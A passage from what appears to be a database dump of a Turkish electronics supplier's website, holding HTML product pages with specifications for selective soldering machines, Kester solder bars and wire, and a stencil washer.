dakikalar i&ccedil;inde program hazırlama</li>\r\n<li>M&uuml;kemmel hassasiyet ve tekrar edebilirlik&nbsp;</li>\r\n<li>18m/dak eksen hızıyla end&uuml;strideki en hızlı sistemler arasındadır</li>\r\n<li>Değişik komponentler i&ccedil;in geniş nozzle se&ccedil;enekleri</li>\r\n<li>Dahili Siemens S7 dokunmatik ekran paneli ile t&uuml;m fonksiyonların otomatik kontrol&uuml; sağlanır</li>\r\n<li>&Ccedil;iftli sprey nozzle ve fluxer opsiyonu ile &uuml;retim iki katına &ccedil;ıkartılabilir</li>\r\n</ul>\r\n<table border=\"0\" >\r\n<tbody>\r\n<tr>\r\n<td >&nbsp;<img src=\"images/ddm/ESS_kafa-400x476.jpg\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p >&nbsp;</p>\r\n<p >&nbsp;</p>\r\n<table id=zebra-blue border=\"0\"  cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody >\r\n<tr >\r\n<td >MODEL ADI</td>\r\n<td >ESS-500</td>\r\n</tr>\r\n<tr>\r\n<td >Maksimum PCB Boyutları</td>\r\n<td >500mm x 500mm</td>\r\n</tr>\r\n<tr >\r\n<td>Lehim Tarafında maks. y&uuml;kseklik</td>\r\n<td >25mm</td>\r\n</tr>\r\n<tr >\r\n<td >Maksimum hız</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">6m/dk</td>\r\n</tr>\r\n<tr >\r\n<td >Taşıma a&ccedil;ısı</td>\r\n<td >0 derece</td>\r\n</tr>\r\n<tr >\r\n<td >Pozisyonel hassasiyet</td>\r\n<td>+/-0.1mm</td>\r\n</tr>\r\n<tr>\r\n<td >Flux tank</td>\r\n<td >2L Paslanmaz &ccedil;elik - flux seviyesi monit&ouml;r &ouml;zellikli</td>\r\n</tr>\r\n<tr>\r\n<td >Flux maksimum hız</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">6m/dk</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\" width=\"192\" height=\"19\">Spray genişliği</td>\r\n<td style=\"margin-left: 30px;\" width=\"335\">3mm - 6mm</td>\r\n</tr>\r\n<tr>\r\n<td >&Ouml;n-ısıtma</td>\r\n<td>100% IR - 900W</td>\r\n</tr>\r\n<tr>\r\n<td>Lehimleme mod&uuml;l&uuml;</td>\r\n<td>Nozzle</td>\r\n</tr>\r\n<tr >\r\n<td >En k&uuml;&ccedil;&uuml;k nozzle &ccedil;apı</td>\r\n<td >4mm</td>\r\n</tr>\r\n<tr>\r\n<td>Min. yandaki malzeme mesafi</td>\r\n<td >1.5 - 3mm (nozzle\'a g&ouml;re değişir)</td>\r\n</tr>\r\n<tr >\r\n<td >Lehim kapasitesi</td>\r\n<td >15kg</td>\r\n</tr>\r\n<tr \">\r\n<td>Maksimum Sıcaklık</td>\r\n<td>400<sup>o</sup>C</td>\r\n</tr>\r\n<tr >\r\n<td>Isınma s&uuml;resi</td>\r\n<td>Yaklaşık 45 dk</td>\r\n</tr>\r\n<tr >\r\n<td >Nitrojen</td>\r\n<td >Şişe, tank veya jenerat&ouml;r (lehim banyosu ve pompa &uuml;nitesi &uuml;st&uuml;nde)</td>\r\n</tr>\r\n<tr >\r\n<td >Nitrojen basıncı</td>\r\n<td>2 bar</td>\r\n</tr>\r\n<tr >\r\n<td >Nitrojen t&uuml;ketimi</td>\r\n<td >\r\n<p>0.8 - 1.7 cfm (23-49 litre/dk) - nozzle g&ouml;re değişir</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td >Hava basıncı</td>\r\n<td >5.5 bar</td>\r\n</tr>\r\n<tr >\r\n<td >Elektriksel</td>\r\n<td >220VAC, tek faz, 15A</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td >Boyutlar</td>\r\n<td >1440 L x 1250 W x 1400mm H</td>\r\n</tr>\r\n<tr >\r\n<td >Ağırlık</td>\r\n<td >403kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','ESS-500','','','','ess-310'),(25,'Bölgesel Lehimleme','<h2 style=\"text-align: left;\">ESS-310 Bölgesel Lehimleme Makinesi</h2>\r\n<ul style=\"text-align: left;\">\r\n<li>El ile lehimleme prosesinden kurtulmak i&ccedil;in&nbsp;ekonomik &ccedil;&ouml;z&uuml;m&nbsp;</li>\r\n<li>Flux uygulama, &ouml;n ısıtma ve b&ouml;lgesel lehimleme mod&uuml;lleriyle b&uuml;t&uuml;nleşik lehimleme sistemi</li>\r\n<li>&nbsp;\'PhotoScan\' yazılımıyla dakikalar i&ccedil;inde program hazırlama</li>\r\n<li>M&uuml;kemmel hassasiyet ve tekrar edebilirlik&nbsp;</li>\r\n<li>18m/dak eksen hızıyla end&uuml;strideki en hızlı sistemler arasındadır</li>\r\n<li>Değişik komponentler i&ccedil;in geniş nozzle se&ccedil;enekleri</li>\r\n<li>Dahili Siemens S7 dokunmatik ekran paneli ile t&uuml;m fonksiyonların otomatik kontrol&uuml; sağlanır</li>\r\n<li>&Ccedil;iftli sprey nozzle ve fluxer opsiyonu ile &uuml;retim iki katına &ccedil;ıkartılabilir</li>\r\n</ul>\r\n<table style=\"height: 471px; width: 575px;\">\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;<img src=\"images/ddm/ESS_kafa-400x476.jpg\" alt=\"\" /></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<table border=\"0\" id=\"zebra-blue\" cellspacing=\"0\" cellpadding=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>MODEL ADI</td>\r\n<td>ESS-310</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum PCB Boyutları</td>\r\n<td>300mm x 300mm</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim Tarafında maks. y&uuml;kseklik</td>\r\n<td>25mm</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum hız</td>\r\n<td>6m/dk</td>\r\n</tr>\r\n<tr>\r\n<td>Taşıma a&ccedil;ısı</td>\r\n<td>0 derece</td>\r\n</tr>\r\n<tr>\r\n<td>Pozisyonel hassasiyet</td>\r\n<td>+/-0.1mm</td>\r\n</tr>\r\n<tr>\r\n<td>Flux tank</td>\r\n<td>2L Paslanmaz &ccedil;elik - flux seviyesi monit&ouml;r &ouml;zellikli</td>\r\n</tr>\r\n<tr>\r\n<td>Flux maksimum hız</td>\r\n<td>6m/dk</td>\r\n</tr>\r\n<tr>\r\n<td>Spray genişliği</td>\r\n<td>3mm - 6mm</td>\r\n</tr>\r\n<tr>\r\n<td>&Ouml;n-ısıtma</td>\r\n<td>100% IR - 900W</td>\r\n</tr>\r\n<tr>\r\n<td width=\"192\" height=\"19\">Lehimleme mod&uuml;l&uuml;</td>\r\n<td width=\"335\">Nozzle</td>\r\n</tr>\r\n<tr>\r\n<td>En k&uuml;&ccedil;&uuml;k nozzle &ccedil;apı</td>\r\n<td>4mm</td>\r\n</tr>\r\n<tr>\r\n<td>Min. yandaki malzeme mesafi</td>\r\n<td>1.5 - 3mm (nozzle\'a g&ouml;re değişir)</td>\r\n</tr>\r\n<tr>\r\n<td>Lehim kapasitesi</td>\r\n<td>15kg</td>\r\n</tr>\r\n<tr>\r\n<td>Maksimum Sıcaklık</td>\r\n<td>400oC</td>\r\n</tr>\r\n<tr>\r\n<td>Isınma s&uuml;resi</td>\r\n<td>Yaklaşık 45 dk</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen</td>\r\n<td>Şişe, tank veya jenerat&ouml;r (lehim banyosu ve pompa &uuml;nitesi &uuml;st&uuml;nde)</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen basıncı</td>\r\n<td>2 bar</td>\r\n</tr>\r\n<tr>\r\n<td>Nitrojen t&uuml;ketimi</td>\r\n<td>\r\n<p>0.8 - 1.7 cfm (23-49 litre/dk) - nozzle g&ouml;re değişir</p>\r\n</td>\r\n</tr>\r\n<tr>\r\n<td>Hava basıncı</td>\r\n<td>5.5 bar</td>\r\n</tr>\r\n<tr>\r\n<td>Elektriksel</td>\r\n<td>220VAC, tek faz, 15A</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>1240 L x 1050 W x 1400mm H</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>354kg</td>\r\n</tr>\r\n</tbody>\r\n</table>','ESS-310','','','','ess-310-24'),(26,'E-BAR SAC305','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER E-BAR&nbsp;ÇUBUK LEHİM</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Karmaşık elektronik devreler ve PCB\'ler sadece endüstriyal metaryellerin uyumluluğunu istemezler, bununla birlikte kullanılan alaşımların tamamen metalik oksitlerden arındırılmış olması da gereklidir. KESTER E-Bar\'ın üretiminde sadece en yüksek saflıktaki daha önce işlenmemiş metaller kullanılır. KESTER E-Bar günümüz endüstri standartlarının çok üstünde saflıkta ürünler sunarak, tam metalik devamlılık, gelişmiş akışkanlık ve azaltılmış yüzey gerilimi sağlar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp; &nbsp;<img src=\"images/kester/kester_sb1.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_sb_3.png\" alt=\"\" width=\"146\" height=\"76\" border=\"0\" />&nbsp;<img src=\"images/kester/kester_sb_2.png\" alt=\"\" width=\"210\" height=\"102\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>K100LD&nbsp;</td>\r\n<td>K100&nbsp;</td>\r\n<td>SAC305&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Kalay %&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp;99.3</td>\r\n<td style=\"text-align: center;\">99.4&nbsp;</td>\r\n<td style=\"text-align: center;\">96.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Gümüş %&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">3.0&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Bakır %&nbsp;</td>\r\n<td style=\"text-align: center;\">0.7&nbsp;</td>\r\n<td style=\"text-align: center;\">0.6&nbsp;</td>\r\n<td style=\"text-align: center;\">0.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Nikel içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Bismuth içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Erime Sıcaklığı</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">217-220<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Tavsiye Edilen Pota Sıcaklığı</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">250-260<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Ekleme</td>\r\n<td style=\"text-align: center;\">K100LDa</td>\r\n<td style=\"text-align: center;\">K100a</td>\r\n<td style=\"text-align: center;\">SAC300</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/kester_unpurities.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Alaşımlar\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong>Mevcut Alaşımlar</strong></p>\r\n<table style=\"margin-left: 30px;\" border=\"1\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">Erime Sıcaklıkları&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Kurşunlu Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn63Pb37</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn60Pb40</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183-190°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Kurşunsuz Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.0Cu0.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-220°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn95.5Ag3.8Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn99.3Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;227°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn100</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;232°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;K100</td>\r\n<td style=\"margin-left: 30px; text-align: right;\">&nbsp;<span style=\"font-size: 11px;\">227°C</span></td>\r\n</tr>\r\n</tbody>\r\n</table>','E-BAR SAC305','','','','e-bar'),(46,'Elek Yıkama','<h5 style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; line-height: 15.807999610900879px; text-align: start;\">Yarı Otomatik&nbsp;Stensil Temizleme&nbsp;Sistemi</h5>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p>&nbsp;</p>\r\n<p>/</p>\r\n<table style=\"font-family: Tahoma, Helvetica, Arial, sans-serif;\" border=\"0\">\r\n<tbody>\r\n<tr>\r\n<td style=\"font-size: 10px;\"><img src=\"images/aqueous/A_StencilWasher-ECO_s.jpg\" alt=\"\" />&nbsp;</td>\r\n<td style=\"font-size: 10px;\">\r\n<ul>\r\n<li><strong>Tam fonksiyonlu ultrasonic temizleme sistemi&nbsp;</strong></li>\r\n<li><strong>Krem lehim temizliği için hızlı, etkili ve ekonomik bir çözümdür</strong></li>\r\n<li><strong>Standart ekipman temizleme için gerekli tüm opsiyonları (yıkama, durulama, kurutma ve filtreleme)&nbsp;içerir</strong></li>\r\n<li><strong>Yarı otomatik kontrol</strong></li>\r\n</ul>\r\n</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><a href=\"http://www.aqueoustech.com/StencilWasher-Series.html\" style=\"color: #1b57b1; text-decoration: none;\"><span style=\"text-decoration: underline;\"><span style=\"color: #810081;\">&nbsp;</span></span></a></p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p>&nbsp;</p>\r\n<table cellspacing=\"0\">\r\n<tbody>\r\n<tr>\r\n<td>Ürün</td>\r\n<td>Stencil Washer - ECO</td>\r\n</tr>\r\n<tr>\r\n<td>Uygulama</td>\r\n<td>Krem Lehim Temizleme</td>\r\n</tr>\r\n<tr>\r\n<td>Boyutlar</td>\r\n<td>39\" L x 25\" W x 32\" H</td>\r\n</tr>\r\n<tr>\r\n<td>Ağırlık</td>\r\n<td>350 lbs</td>\r\n</tr>\r\n<tr>\r\n<td>Gövde</td>\r\n<td>Kaynaklı Çelik Gövde<br />16 Gauge Çelik Paneller</td>\r\n</tr>\r\n<tr>\r\n<td>Kaplama</td>\r\n<td>Toz kaplamalı Epoxy</td>\r\n</tr>\r\n<tr>\r\n<td>Dahili Tesisat</td>\r\n<td>Paslanmaz Çelik Polypropylene</td>\r\n</tr>\r\n<tr>\r\n<td>Elektriksel</td>\r\n<td>220 VAC 5 amps</td>\r\n</tr>\r\n<tr>\r\n<td>Yıkama Tankı Kapasitesi</td>\r\n<td>76 Liters</td>\r\n</tr>\r\n<tr>\r\n<td>Maks. Elek Boyutu</td>\r\n<td>29\" x 29\" (74cm x 74cm)<br />25\" x 29\" Immersion</td>\r\n</tr>\r\n<tr>\r\n<td>Drenaj İhtiyacı</td>\r\n<td>3/4\" NPT</td>\r\n</tr>\r\n<tr>\r\n<td>Yıkama Süresi</td>\r\n<td>Analog 1-99 Minutes</td>\r\n</tr>\r\n<tr>\r\n<td>Ultrasonik</td>\r\n<td>500 Watt Yandan monte&nbsp;<br />Transducers</td>\r\n</tr>\r\n<tr>\r\n<td>El ile tutulan Durulama Değneği</td>\r\n<td>Standart</td>\r\n</tr>\r\n<tr>\r\n<td>El ile tutulan Hava Bıçağı</td>\r\n<td>Standart</td>\r\n</tr>\r\n<tr>\r\n<td>Yıkama Sıvısı Isıtma Sistemi</td>\r\n<td>YOK</td>\r\n</tr>\r\n<tr>\r\n<td>Durulama Suyu Filtrasyon Sistemi</td>\r\n<td>Optiyonel</td>\r\n</tr>\r\n</tbody>\r\n</table>','Stencil Washer - ECO','','','','stencil-washer-eco'),(27,'E-BAR K100','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER E-BAR&nbsp;ÇUBUK LEHİM</strong></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">Karmaşık elektronik devreler ve PCB\'ler sadece endüstriyal metaryellerin uyumluluğunu istemezler, bununla birlikte kullanılan alaşımların tamamen metalik oksitlerden arındırılmış olması da gereklidir. KESTER E-Bar\'ın üretiminde sadece en yüksek saflıktaki daha önce işlenmemiş metaller kullanılır. KESTER E-Bar günümüz endüstri standartlarının çok üstünde saflıkta ürünler sunarak, tam metalik devamlılık, gelişmiş akışkanlık ve azaltılmış yüzey gerilimi sağlar.</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp; &nbsp;<img src=\"images/kester/kester_sb1.png\" alt=\"\" border=\"0\" />&nbsp;&nbsp;&nbsp;<img src=\"images/kester/kester_sb_3.png\" alt=\"\" width=\"146\" height=\"76\" border=\"0\" />&nbsp;<img src=\"images/kester/kester_sb_2.png\" alt=\"\" width=\"210\" height=\"102\" border=\"0\" />&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" title=\"Teknik Bilgiler\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td>&nbsp;</td>\r\n<td>K100LD&nbsp;</td>\r\n<td>K100&nbsp;</td>\r\n<td>SAC305&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Kalay %&nbsp;</td>\r\n<td style=\"text-align: center;\">&nbsp;99.3</td>\r\n<td style=\"text-align: center;\">99.4&nbsp;</td>\r\n<td style=\"text-align: center;\">96.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Gümüş %&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">0&nbsp;</td>\r\n<td style=\"text-align: center;\">3.0&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Bakır %&nbsp;</td>\r\n<td style=\"text-align: center;\">0.7&nbsp;</td>\r\n<td style=\"text-align: center;\">0.6&nbsp;</td>\r\n<td style=\"text-align: center;\">0.5&nbsp;</td>\r\n</tr>\r\n<tr>\r\n<td>Nikel içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Bismuth içerir</td>\r\n<td style=\"text-align: center;\">Evet</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n<td style=\"text-align: center;\">Hayır</td>\r\n</tr>\r\n<tr>\r\n<td>Erime Sıcaklığı</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">227<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">217-220<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Tavsiye Edilen Pota Sıcaklığı</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">255-265<sup>o</sup>C</td>\r\n<td style=\"text-align: center;\">250-260<sup>o</sup>C</td>\r\n</tr>\r\n<tr>\r\n<td>Ekleme</td>\r\n<td style=\"text-align: center;\">K100LDa</td>\r\n<td style=\"text-align: center;\">K100a</td>\r\n<td style=\"text-align: center;\">SAC300</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><img src=\"images/kester/kester_unpurities.png\" alt=\"\" border=\"0\" /></p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<hr class=\"system-pagebreak\" style=\"width: 1255.3125px; word-spacing: 0px;\" title=\"Alaşımlar\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start; margin-left: 30px;\"><strong>Mevcut Alaşımlar</strong></p>\r\n<table style=\"margin-left: 30px;\" border=\"1\">\r\n<tbody style=\"margin-left: 30px;\">\r\n<tr style=\"margin-left: 30px;\">\r\n<td>&nbsp;</td>\r\n<td style=\"margin-left: 30px;\">Erime Sıcaklıkları&nbsp;&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">Kurşunlu Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn63Pb37</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn60Pb40</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;183-190°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Kurşunsuz Alaşımlar&nbsp;</td>\r\n<td>&nbsp;</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn96.5Ag3.0Cu0.5</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-220°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn95.5Ag3.8Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;217-221°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn99.3Cu0.7</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;227°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;Sn100</td>\r\n<td style=\"margin-left: 30px;\">\r\n<p style=\"margin-left: 30px;\" align=\"center\">&nbsp;232°C</p>\r\n</td>\r\n</tr>\r\n<tr style=\"margin-left: 30px;\">\r\n<td style=\"margin-left: 30px;\">&nbsp;K100</td>\r\n<td style=\"margin-left: 30px; text-align: right;\">&nbsp;<span style=\"font-size: 11px;\">227°C</span></td>\r\n</tr>\r\n</tbody>\r\n</table>','E-BAR K100','','','','e-bar-26'),(28,'Kurşunsuz Tel Lehim - 1.2mm','<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\"><strong>KESTER LEHİM TELİ</strong></p>\r\n<hr class=\"system-pagebreak\" title=\"Ürün Bilgisi\" />\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">&nbsp;</p>\r\n<p style=\"color: #333333; font-family: Tahoma, Helvetica, Arial, sans-serif; font-size: 12px; line-height: 15.807999610900879px; text-align: start;\">\"Cored Wire\" ın mucidi olan KESTER, mükemmel flux förmülleri ve kullanığı saf alaşımlarla dünyanın en büyük üreticilerindendir. Uzun yıllara dayanan tecrübesi ve her üretime uygun flux ve alaşım çeşitleriyle tüm ihtiyaçlarınıza uygun çözümler sunar.</p>\r\n<p 